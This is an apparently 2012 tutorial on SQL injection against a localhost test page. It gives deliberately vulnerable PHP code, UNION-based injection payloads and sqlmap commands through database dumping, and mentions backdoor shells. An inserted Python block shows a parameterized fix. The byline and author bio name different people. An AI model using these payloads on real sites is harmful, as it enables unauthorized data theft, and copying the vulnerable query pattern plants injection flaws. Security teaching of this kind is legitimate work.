SQLMAP – Automated SQL Injection Testing Tool

January 11, 2012

SQL injection is one of the most common vulnerabilities found in web applications today. Exploiting SQL injection manually is somewhat tedious. Using probes like "or 1=1--" and "and 1>2" we can find out whether the vulnerability is present, but exploiting it needs an altogether different approach. Tools like sqlmap, Havij and Pangolin help in exploiting SQL injection.

In this article we use the sample code below to show how the vulnerability can be exploited manually and then with the sqlmap tool.

Sample code –

<?php
// Sample code, deliberately vulnerable: the id parameter is read from the
// query string and pasted into the SQL text without any validation.
$id = $_GET["id"];

// Placeholder connection details: host, user, password.
$con = mysql_connect("localhost", "db-admin", "db-password");
if (!$con)
{
    die('Could not connect: ' . mysql_error());
}
// Placeholder database name.
mysql_select_db("db-name", $con);

// Injection point: $id is concatenated into the query unquoted and unchecked.
$query = "SELECT * FROM sample_table WHERE id=$id";
// Echoing the query back shows the visitor exactly which statement ran.
echo "<h1>" . $query . "</h1>";
$result = mysql_query($query);
while ($row = mysql_fetch_array($result))
{
    echo $row['id'] . " " . $row['name'];
    echo "<br />";
}
mysql_close($con);
?>

We deployed the application with the code above and accessed the URL:

http://localhost/xampp/1.php?id=1

which gives us the data present in the database for id=1.

If we append a single quote (') to the end of the query, we get the screen below with an unhandled error message from the database. This shows there is a possibility of SQL injection.

If we add "or 1=1" to the end of the URL we get all the rows of the table. This shows that SQL injection is possible.

Now let's get into exploiting the vulnerability. Our first task is to find the number of columns selected in the query. We find that by appending "order by 1", "order by 2", "order by 3" and so on to the end of the URL.

For "order by 4" an error is returned, which means three columns are present in this select query. Now we play with the URL to dig more details out of the database. We gave the URL as – http://localhost/xampp/1.php?id=1 union select system_user(), 1, 2 from information_schema.schema_privileges-- This gives the system user of the database.

Similarly, we find table names, table_schema, columns and data by manipulating the URL as below: http://localhost/xampp/1.php?id=1 union select table_name, 1, 2 from information_schema.columns--
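To show why the sample code above reacts the way the manual probes describe, and what the fix looks like, here is an added Python example (not from the article, and not sqlmap's code) that replays the same probes against a constructed three-column SQLite table in memory and puts a parameterized lookup beside the vulnerable one; sample_table, its rows and the column names are assumptions.

```python
import sqlite3

# Constructed stand-in for the article's three-column table, kept in memory.
SAMPLE_ROWS = [(1, "alice", "alice@example.test"),
               (2, "bob", "bob@example.test"),
               (3, "carol", "carol@example.test")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sample_table (id INTEGER, name TEXT, email TEXT)")
    con.executemany("INSERT INTO sample_table VALUES (?, ?, ?)", SAMPLE_ROWS)
    return con


def lookup_vulnerable(con, user_id):
    """Same shape as 1.php: the request value is pasted into the SQL text."""
    query = "SELECT * FROM sample_table WHERE id=" + user_id
    return con.execute(query).fetchall()


def lookup_safe(con, user_id):
    """Hardened form: reject anything but digits, then bind as a parameter."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return con.execute("SELECT * FROM sample_table WHERE id=?",
                       (int(user_id),)).fetchall()


def probe(con, user_id):
    """How the vulnerable path reacts to one value: the row count on success,
    or the database error text (what the article's screenshots show for the
    single-quote and ORDER BY probes)."""
    try:
        return ("rows", len(lookup_vulnerable(con, user_id)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def run_probes(con):
    """Replay the article's manual steps against the toy table."""
    values = ["1", "1'", "1 or 1=1", "1 order by 3", "1 order by 4",
              "1 union select sqlite_version(), 1, 2"]
    return {v: probe(con, v) for v in values}


if __name__ == "__main__":
    db = make_db()
    for value, outcome in run_probes(db).items():
        print(f"id={value!r:45} -> {outcome}")
    print("safe lookup:", lookup_safe(db, "1"))
```

The ORDER BY probe errors only once the term exceeds the three selected columns, which is the column-count trick the article uses, while the parameterized lookup rejects every one of the non-numeric values before any SQL runs.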

However, the whole exercise we went through to find the vulnerability manually can be done with the sqlmap tool in a few minutes. To use this tool you only need a Python interpreter and sqlmap. We issue the following command –

sqlmap.py -u http://localhost/xampp/1.php?id=1

and lots of information about the given web application is retrieved in seconds, for example: GET parameter 'id' is vulnerable and 3 columns are present in the given table.

Let's proceed. We learn that the DBMS is MySQL 5.0.11 and the web server is Apache 2.2.17, deployed on a Windows machine.

We now try to find the current database, tables, columns and data, that is, a complete surgery of the application. The command options below find all the details about the application.

sqlmap.py -u http://localhost/xampp/1.php?id=1 --current-db

It gives the name of the current database.

Now it is time to list all the tables present.

sqlmap.py -u http://localhost/xampp/1.php?id=1 --tables

It gives the list of all the tables present in the databases.

Finally, to retrieve all the data present in the database, the following command can be used:

sqlmap.py -u http://localhost/xampp/1.php?id=1 --dump-all

All the data is retrieved and saved in the output folder of the sqlmap directory. The tool has many more capabilities and can be used to perform dictionary attacks, create a backdoor shell, etc. So try it out, and happy hacking!

Shahbaz Shantanu Shukla


Prajwal is a Senior Developer at Matriux, publishing articles for CHmag under "Matriux Vibhag" every month. He is also the n|u Hyderabad chapter lead, is currently pursuing a Master's degree at Texas Tech University, USA, and is CEH v6 certified.
